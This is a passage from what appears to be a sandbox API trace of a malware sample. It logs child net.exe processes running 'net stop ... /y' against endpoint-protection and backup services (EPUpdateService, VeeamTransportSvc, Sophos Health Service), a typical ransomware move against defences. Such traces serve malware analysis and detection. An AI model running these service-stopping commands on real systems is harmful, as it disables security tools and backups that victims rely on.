(in: hModule=0x0, lpFilename=0x36f6f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0042.582] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x72) returned 0x7bf788 [0042.583] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0042.583] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f8f8 | out: Buffer=0x36f8f8*=0x7c1c78) returned 0x0 [0042.583] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f8f8 | out: Buffer=0x36f8f8*=0x7c1c90) returned 0x0 [0042.583] _fileno (_File=0x74eb2900) returned -2 [0042.583] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0042.583] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0042.583] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0042.583] _wcsicmp (_String1="config", _String2="stop") returned -16 [0042.583] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0042.583] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0042.583] _wcsicmp (_String1="file", _String2="stop") returned -13 [0042.583] _wcsicmp (_String1="files", _String2="stop") returned -13 [0042.583] _wcsicmp (_String1="group", _String2="stop") returned -12 [0042.583] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0042.583] _wcsicmp (_String1="help", _String2="stop") returned -11 [0042.583] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0042.583] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0042.583] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0042.583] _wcsicmp (_String1="session", _String2="stop") returned -15 [0042.583] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0042.583] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0042.583] _wcsicmp (_String1="share", _String2="stop") returned -12 [0042.583] _wcsicmp (_String1="start", _String2="stop") returned -14 [0042.583] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0042.583] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0042.583] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0042.584] _wcsicmp (_String1="accounts", _String2="EPUpdateService") returned -4 [0042.584] _wcsicmp (_String1="computer", _String2="EPUpdateService") returned -2 [0042.584] _wcsicmp (_String1="config", _String2="EPUpdateService") returned -2 [0042.584] _wcsicmp (_String1="continue", _String2="EPUpdateService") returned -2 [0042.584] _wcsicmp (_String1="cont", _String2="EPUpdateService") returned -2 [0042.584] _wcsicmp (_String1="file", _String2="EPUpdateService") returned 1 [0042.584] _wcsicmp (_String1="files", _String2="EPUpdateService") returned 1 [0042.584] _wcsicmp (_String1="group", _String2="EPUpdateService") returned 2 [0042.584] _wcsicmp (_String1="groups", _String2="EPUpdateService") returned 2 [0042.584] _wcsicmp (_String1="help", _String2="EPUpdateService") returned 3 [0042.584] _wcsicmp (_String1="helpmsg", _String2="EPUpdateService") returned 3 [0042.584] _wcsicmp (_String1="localgroup", _String2="EPUpdateService") returned 7 [0042.584] _wcsicmp (_String1="pause", _String2="EPUpdateService") returned 11 [0042.584] _wcsicmp (_String1="session", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="sessions", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="sess", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="share", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="start", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="stats", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="statistics", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="stop", _String2="EPUpdateService") returned 14 [0042.584] _wcsicmp (_String1="time", _String2="EPUpdateService") returned 15 [0042.584] _wcsicmp (_String1="user", _String2="EPUpdateService") returned 16 [0042.584] _wcsicmp (_String1="users", _String2="EPUpdateService") returned 16 [0042.584] _wcsicmp (_String1="msg", _String2="EPUpdateService") returned 8 [0042.584] _wcsicmp (_String1="messenger", _String2="EPUpdateService") returned 8 [0042.584] _wcsicmp (_String1="receiver", _String2="EPUpdateService") returned 13 [0042.584] _wcsicmp (_String1="rcv", _String2="EPUpdateService") returned 13 [0042.584] _wcsicmp (_String1="netpopup", _String2="EPUpdateService") returned 9 [0042.584] _wcsicmp (_String1="redirector", _String2="EPUpdateService") returned 13 [0042.584] _wcsicmp (_String1="redir", _String2="EPUpdateService") returned 13 [0042.584] _wcsicmp (_String1="rdr", _String2="EPUpdateService") returned 13 [0042.584] _wcsicmp (_String1="workstation", _String2="EPUpdateService") returned 18 [0042.584] _wcsicmp (_String1="work", _String2="EPUpdateService") returned 18 [0042.584] _wcsicmp (_String1="wksta", _String2="EPUpdateService") returned 18 [0042.584] _wcsicmp (_String1="prdr", _String2="EPUpdateService") returned 11 [0042.585] _wcsicmp (_String1="devrdr", _String2="EPUpdateService") returned -1 [0042.585] _wcsicmp (_String1="lanmanworkstation", _String2="EPUpdateService") returned 7 [0042.585] _wcsicmp (_String1="server", _String2="EPUpdateService") returned 14 [0042.585] _wcsicmp (_String1="svr", _String2="EPUpdateService") returned 14 [0042.585] _wcsicmp (_String1="srv", _String2="EPUpdateService") returned 14 [0042.585] _wcsicmp (_String1="lanmanserver", _String2="EPUpdateService") returned 7 [0042.585] _wcsicmp (_String1="alerter", _String2="EPUpdateService") returned -4 [0042.585] _wcsicmp (_String1="netlogon", _String2="EPUpdateService") returned 9 [0042.585] _wcsupr (in: _String="EPUpdateService" | out: _String="EPUPDATESERVICE") returned="EPUPDATESERVICE" [0042.585] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7c5460 [0042.587] GetServiceKeyNameW (in: hSCManager=0x7c5460, lpDisplayName="EPUPDATESERVICE", lpServiceName=0xe7aaf0, lpcchBuffer=0x36f894 | out: lpServiceName="", lpcchBuffer=0x36f894) returned 0 [0042.588] _wcsicmp (_String1="msg", _String2="EPUPDATESERVICE") returned 8 [0042.588] _wcsicmp (_String1="messenger", _String2="EPUPDATESERVICE") returned 8 [0042.588] _wcsicmp (_String1="receiver", _String2="EPUPDATESERVICE") returned 13 [0042.588] _wcsicmp (_String1="rcv", _String2="EPUPDATESERVICE") returned 13 [0042.588] _wcsicmp (_String1="redirector", _String2="EPUPDATESERVICE") returned 13 [0042.588] _wcsicmp (_String1="redir", _String2="EPUPDATESERVICE") returned 13 [0042.588] _wcsicmp (_String1="rdr", _String2="EPUPDATESERVICE") returned 13 [0042.588] _wcsicmp (_String1="workstation", _String2="EPUPDATESERVICE") returned 18 [0042.588] _wcsicmp (_String1="work", _String2="EPUPDATESERVICE") returned 18 [0042.588] _wcsicmp (_String1="wksta", _String2="EPUPDATESERVICE") returned 18 [0042.588] _wcsicmp (_String1="prdr", _String2="EPUPDATESERVICE") returned 11 [0042.588] _wcsicmp (_String1="devrdr", _String2="EPUPDATESERVICE") returned -1 [0042.588] _wcsicmp (_String1="lanmanworkstation", _String2="EPUPDATESERVICE") returned 7 [0042.588] _wcsicmp (_String1="server", _String2="EPUPDATESERVICE") returned 14 [0042.588] _wcsicmp (_String1="svr", _String2="EPUPDATESERVICE") returned 14 [0042.588] _wcsicmp (_String1="srv", _String2="EPUPDATESERVICE") returned 14 [0042.588] _wcsicmp (_String1="lanmanserver", _String2="EPUPDATESERVICE") returned 7 [0042.588] _wcsicmp (_String1="alerter", _String2="EPUPDATESERVICE") returned -4 [0042.588] _wcsicmp (_String1="netlogon", _String2="EPUPDATESERVICE") returned 9 [0042.588] NetServiceControl (in: servername=0x0, service="EPUPDATESERVICE", opcode=0x0, arg=0x0, bufptr=0x36f890 | out: bufptr=0x36f890) returned 0x889 [0042.589] wcscpy_s (in: _Destination=0xe7a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0042.589] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0042.590] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe7b338, nSize=0x800, Arguments=0xe79dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0042.591] GetFileType (hFile=0x26c) returned 0x3 [0042.591] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7c3f90 [0042.591] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7c3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0042.591] WriteFile (in: hFile=0x26c, lpBuffer=0x7c3f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36f7d0, lpOverlapped=0x0 | out: lpBuffer=0x7c3f90*, lpNumberOfBytesWritten=0x36f7d0*=0x1e, lpOverlapped=0x0) returned 1 [0042.591] LocalFree (hMem=0x7c3f90) returned 0x0 [0042.591] GetFileType (hFile=0x26c) returned 0x3 [0042.591] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c6238 [0042.591] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0042.591] WriteFile (in: hFile=0x26c, lpBuffer=0x7c6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f7d0, lpOverlapped=0x0 | out: lpBuffer=0x7c6238*, lpNumberOfBytesWritten=0x36f7d0*=0x2, lpOverlapped=0x0) returned 1 [0042.591] LocalFree (hMem=0x7c6238) returned 0x0 [0042.591] _ultow (in: _Dest=0x889, _Radix=3602432 | out: _Dest=0x889) returned="2185" [0042.591] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe7b338, nSize=0x800, Arguments=0xe79dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0042.592] GetFileType (hFile=0x26c) returned 0x3 [0042.592] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7c6238 [0042.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7c6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0042.592] WriteFile (in: hFile=0x26c, lpBuffer=0x7c6238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36f7dc, lpOverlapped=0x0 | out: lpBuffer=0x7c6238*, lpNumberOfBytesWritten=0x36f7dc*=0x34, lpOverlapped=0x0) returned 1 [0042.592] LocalFree (hMem=0x7c6238) returned 0x0 [0042.592] GetFileType (hFile=0x26c) returned 0x3 [0042.592] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c6238 [0042.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0042.592] WriteFile (in: hFile=0x26c, lpBuffer=0x7c6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f7dc, lpOverlapped=0x0 | out: lpBuffer=0x7c6238*, lpNumberOfBytesWritten=0x36f7dc*=0x2, lpOverlapped=0x0) returned 1 [0042.592] LocalFree (hMem=0x7c6238) returned 0x0 [0042.592] NetApiBufferFree (Buffer=0x7c1c78) returned 0x0 [0042.592] NetApiBufferFree (Buffer=0x7c1c90) returned 0x0 [0042.592] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPUpdateService /y" [0042.592] exit (_Code=2) Process: id = "67" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4837d000" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 135 os_tid = 0x358 Process: id = "68" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4815c000" os_pid = "0x90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "67" os_parent_pid = "0x53c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 136 os_tid = 0x7ac [0042.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af804 | out: lpSystemTimeAsFileTime=0x2af804*(dwLowDateTime=0xe3cc6800, dwHighDateTime=0x1d57a86)) [0042.937] GetCurrentProcessId () returned 0x90 [0042.937] GetCurrentThreadId () returned 0x7ac [0042.937] GetTickCount () returned 0x1145b79 [0042.937] QueryPerformanceCounter (in: lpPerformanceCount=0x2af7fc | out: lpPerformanceCount=0x2af7fc*=16322194648) returned 1 [0042.937] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0042.938] __set_app_type (_Type=0x1) [0042.938] __p__fmode () returned 0x74eb31f4 [0042.938] __p__commode () returned 0x74eb31fc [0042.938] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40ffe6) returned 0x0 [0042.938] __getmainargs (in: _Argc=0x419064, _Argv=0x41906c, _Env=0x419068, _DoWildCard=0, _StartInfo=0x419024 | out: _Argc=0x419064, _Argv=0x41906c, _Env=0x419068) returned 0 [0042.938] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.938] GetConsoleOutputCP () returned 0x1b5 [0042.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x419080 | out: lpCPInfo=0x419080) returned 1 [0042.938] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.941] sprintf_s (in: _DstBuf=0x2af7bc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0042.941] setlocale (category=0, locale=".437") returned="English_United States.437" [0042.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0042.943] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0042.943] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0042.943] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af588, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0042.943] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x76) returned 0x2ef788 [0042.944] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0042.944] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2af78c | out: Buffer=0x2af78c*=0x2f1c78) returned 0x0 [0042.944] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2af78c | out: Buffer=0x2af78c*=0x2f1c90) returned 0x0 [0042.944] _fileno (_File=0x74eb2900) returned -2 [0042.944] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0042.944] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0042.944] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0042.944] _wcsicmp (_String1="config", _String2="stop") returned -16 [0042.944] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0042.944] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0042.944] _wcsicmp (_String1="file", _String2="stop") returned -13 [0042.944] _wcsicmp (_String1="files", _String2="stop") returned -13 [0042.944] _wcsicmp (_String1="group", _String2="stop") returned -12 [0042.944] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0042.944] _wcsicmp (_String1="help", _String2="stop") returned -11 [0042.944] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0042.944] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0042.944] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0042.944] _wcsicmp (_String1="session", _String2="stop") returned -15 [0042.944] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0042.944] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0042.944] _wcsicmp (_String1="share", _String2="stop") returned -12 [0042.944] _wcsicmp (_String1="start", _String2="stop") returned -14 [0042.944] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0042.944] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0042.945] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0042.945] _wcsicmp (_String1="accounts", _String2="VeeamTransportSvc") returned -21 [0042.945] _wcsicmp (_String1="computer", _String2="VeeamTransportSvc") returned -19 [0042.945] _wcsicmp (_String1="config", _String2="VeeamTransportSvc") returned -19 [0042.945] _wcsicmp (_String1="continue", _String2="VeeamTransportSvc") returned -19 [0042.945] _wcsicmp (_String1="cont", _String2="VeeamTransportSvc") returned -19 [0042.945] _wcsicmp (_String1="file", _String2="VeeamTransportSvc") returned -16 [0042.945] _wcsicmp (_String1="files", _String2="VeeamTransportSvc") returned -16 [0042.945] _wcsicmp (_String1="group", _String2="VeeamTransportSvc") returned -15 [0042.945] _wcsicmp (_String1="groups", _String2="VeeamTransportSvc") returned -15 [0042.945] _wcsicmp (_String1="help", _String2="VeeamTransportSvc") returned -14 [0042.945] _wcsicmp (_String1="helpmsg", _String2="VeeamTransportSvc") returned -14 [0042.945] _wcsicmp (_String1="localgroup", _String2="VeeamTransportSvc") returned -10 [0042.945] _wcsicmp (_String1="pause", _String2="VeeamTransportSvc") returned -6 [0042.945] _wcsicmp (_String1="session", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="sessions", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="sess", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="share", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="start", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="stats", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="statistics", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="stop", _String2="VeeamTransportSvc") returned -3 [0042.945] _wcsicmp (_String1="time", _String2="VeeamTransportSvc") returned -2 [0042.945] _wcsicmp (_String1="user", _String2="VeeamTransportSvc") returned -1 [0042.945] _wcsicmp (_String1="users", _String2="VeeamTransportSvc") returned -1 [0042.945] _wcsicmp (_String1="msg", _String2="VeeamTransportSvc") returned -9 [0042.945] _wcsicmp (_String1="messenger", _String2="VeeamTransportSvc") returned -9 [0042.945] _wcsicmp (_String1="receiver", _String2="VeeamTransportSvc") returned -4 [0042.945] _wcsicmp (_String1="rcv", _String2="VeeamTransportSvc") returned -4 [0042.945] _wcsicmp (_String1="netpopup", _String2="VeeamTransportSvc") returned -8 [0042.945] _wcsicmp (_String1="redirector", _String2="VeeamTransportSvc") returned -4 [0042.945] _wcsicmp (_String1="redir", _String2="VeeamTransportSvc") returned -4 [0042.945] _wcsicmp (_String1="rdr", _String2="VeeamTransportSvc") returned -4 [0042.945] _wcsicmp (_String1="workstation", _String2="VeeamTransportSvc") returned 1 [0042.946] _wcsicmp (_String1="work", _String2="VeeamTransportSvc") returned 1 [0042.946] _wcsicmp (_String1="wksta", _String2="VeeamTransportSvc") returned 1 [0042.946] _wcsicmp (_String1="prdr", _String2="VeeamTransportSvc") returned -6 [0042.946] _wcsicmp (_String1="devrdr", _String2="VeeamTransportSvc") returned -18 [0042.946] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamTransportSvc") returned -10 [0042.946] _wcsicmp (_String1="server", _String2="VeeamTransportSvc") returned -3 [0042.946] _wcsicmp (_String1="svr", _String2="VeeamTransportSvc") returned -3 [0042.946] _wcsicmp (_String1="srv", _String2="VeeamTransportSvc") returned -3 [0042.946] _wcsicmp (_String1="lanmanserver", _String2="VeeamTransportSvc") returned -10 [0042.946] _wcsicmp (_String1="alerter", _String2="VeeamTransportSvc") returned -21 [0042.946] _wcsicmp (_String1="netlogon", _String2="VeeamTransportSvc") returned -8 [0042.946] _wcsupr (in: _String="VeeamTransportSvc" | out: _String="VEEAMTRANSPORTSVC") returned="VEEAMTRANSPORTSVC" [0042.946] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2f5460 [0042.949] GetServiceKeyNameW (in: hSCManager=0x2f5460, lpDisplayName="VEEAMTRANSPORTSVC", lpServiceName=0x41aaf0, lpcchBuffer=0x2af728 | out: lpServiceName="", lpcchBuffer=0x2af728) returned 0 [0042.949] _wcsicmp (_String1="msg", _String2="VEEAMTRANSPORTSVC") returned -9 [0042.949] _wcsicmp (_String1="messenger", _String2="VEEAMTRANSPORTSVC") returned -9 [0042.949] _wcsicmp (_String1="receiver", _String2="VEEAMTRANSPORTSVC") returned -4 [0042.949] _wcsicmp (_String1="rcv", _String2="VEEAMTRANSPORTSVC") returned -4 [0042.949] _wcsicmp (_String1="redirector", _String2="VEEAMTRANSPORTSVC") returned -4 [0042.949] _wcsicmp (_String1="redir", _String2="VEEAMTRANSPORTSVC") returned -4 [0042.949] _wcsicmp (_String1="rdr", _String2="VEEAMTRANSPORTSVC") returned -4 [0042.949] _wcsicmp (_String1="workstation", _String2="VEEAMTRANSPORTSVC") returned 1 [0042.950] _wcsicmp (_String1="work", _String2="VEEAMTRANSPORTSVC") returned 1 [0042.950] _wcsicmp (_String1="wksta", _String2="VEEAMTRANSPORTSVC") returned 1 [0042.950] _wcsicmp (_String1="prdr", _String2="VEEAMTRANSPORTSVC") returned -6 [0042.950] _wcsicmp (_String1="devrdr", _String2="VEEAMTRANSPORTSVC") returned -18 [0042.950] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMTRANSPORTSVC") returned -10 [0042.950] _wcsicmp (_String1="server", _String2="VEEAMTRANSPORTSVC") returned -3 [0042.950] _wcsicmp (_String1="svr", _String2="VEEAMTRANSPORTSVC") returned -3 [0042.950] _wcsicmp (_String1="srv", _String2="VEEAMTRANSPORTSVC") returned -3 [0042.950] _wcsicmp (_String1="lanmanserver", _String2="VEEAMTRANSPORTSVC") returned -10 [0042.950] _wcsicmp (_String1="alerter", _String2="VEEAMTRANSPORTSVC") returned -21 [0042.950] _wcsicmp (_String1="netlogon", _String2="VEEAMTRANSPORTSVC") returned -8 [0042.950] NetServiceControl (in: servername=0x0, service="VEEAMTRANSPORTSVC", opcode=0x0, arg=0x0, bufptr=0x2af724 | out: bufptr=0x2af724) returned 0x889 [0042.951] wcscpy_s (in: _Destination=0x41a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0042.951] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0042.951] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x41b338, nSize=0x800, Arguments=0x419dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0042.952] GetFileType (hFile=0x26c) returned 0x3 [0042.952] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2f3f90 [0042.952] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2f3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0042.952] WriteFile (in: hFile=0x26c, lpBuffer=0x2f3f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2af664, lpOverlapped=0x0 | out: lpBuffer=0x2f3f90*, lpNumberOfBytesWritten=0x2af664*=0x1e, lpOverlapped=0x0) returned 1 [0042.952] LocalFree (hMem=0x2f3f90) returned 0x0 [0042.952] GetFileType (hFile=0x26c) returned 0x3 [0042.952] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f6238 [0042.953] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0042.953] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2af664, lpOverlapped=0x0 | out: lpBuffer=0x2f6238*, lpNumberOfBytesWritten=0x2af664*=0x2, lpOverlapped=0x0) returned 1 [0042.953] LocalFree (hMem=0x2f6238) returned 0x0 [0042.953] _ultow (in: _Dest=0x889, _Radix=2815636 | out: _Dest=0x889) returned="2185" [0042.953] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x41b338, nSize=0x800, Arguments=0x419dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0042.953] GetFileType (hFile=0x26c) returned 0x3 [0042.953] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2f6238 [0042.953] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2f6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0042.953] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2af670, lpOverlapped=0x0 | out: lpBuffer=0x2f6238*, lpNumberOfBytesWritten=0x2af670*=0x34, lpOverlapped=0x0) returned 1 [0042.953] LocalFree (hMem=0x2f6238) returned 0x0 [0042.953] GetFileType (hFile=0x26c) returned 0x3 [0042.953] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f6238 [0042.953] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0042.953] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2af670, lpOverlapped=0x0 | out: lpBuffer=0x2f6238*, lpNumberOfBytesWritten=0x2af670*=0x2, lpOverlapped=0x0) returned 1 [0042.953] LocalFree (hMem=0x2f6238) returned 0x0 [0042.953] NetApiBufferFree (Buffer=0x2f1c78) returned 0x0 [0042.954] NetApiBufferFree (Buffer=0x2f1c90) returned 0x0 [0042.954] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0042.954] exit (_Code=2) Process: id = "69" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x48482000" os_pid = "0x7b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos Health ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM 